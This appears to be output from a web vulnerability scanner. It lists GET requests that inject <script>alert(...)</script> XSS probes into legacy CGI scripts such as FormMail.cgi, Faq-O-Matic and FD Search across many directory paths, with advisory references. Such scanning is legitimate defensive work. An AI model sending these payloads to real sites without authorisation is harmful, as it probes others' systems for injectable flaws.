+ OSVDB-0: GET /cgi-perl/test-cgi.exe?<script>alert(document.cookie)</script> : Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi.cgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /webcgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /cgi-914/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /cgi-915/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /cgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /mpcgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /ows-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /cgi-local/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /htbin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /cgibin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /cgis/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /scripts/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /cgi-win/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /fcgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /cgi-exe/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /cgi-home/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /cgi-perl/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> : Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
+ OSVDB-0: GET /cgi.cgi/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /webcgi/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /cgi-914/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /cgi-915/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /bin/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /cgi/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /mpcgi/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /ows-bin/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /cgi-local/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /htbin/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /cgibin/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /cgis/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /scripts/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /cgi-win/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /fcgi-bin/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /cgi-exe/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /cgi-home/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /cgi-perl/search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
+ OSVDB-0: GET /cgi.cgi/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /webcgi/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-914/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-915/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /bin/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /mpcgi/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ows-bin/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-local/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /htbin/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgibin/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgis/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /scripts/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-win/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /fcgi-bin/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-exe/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-home/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-perl/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormMail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi.cgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /webcgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /cgi-914/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /cgi-915/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /cgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /mpcgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /ows-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /cgi-local/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /htbin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /cgibin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /cgis/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /scripts/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /cgi-win/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /fcgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /cgi-exe/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /cgi-home/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /cgi-perl/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
+ OSVDB-0: GET /cgi.cgi/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /webcgi/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-914/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-915/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /bin/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /mpcgi/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ows-bin/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-local/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /htbin/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgibin/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgis/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /scripts/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-win/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /fcgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-exe/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-home/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-perl/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi.cgi/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /webcgi/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-914/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-915/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /mpcgi/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ows-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-local/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /htbin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgibin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgis/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /scripts/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-win/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /fcgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-exe/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-home/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-perl/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script> : CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi.cgi/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /webcgi/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-914/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-915/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /bin/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /mpcgi/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /ows-bin/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgi-local/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /htbin/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgibin/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /cgis/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
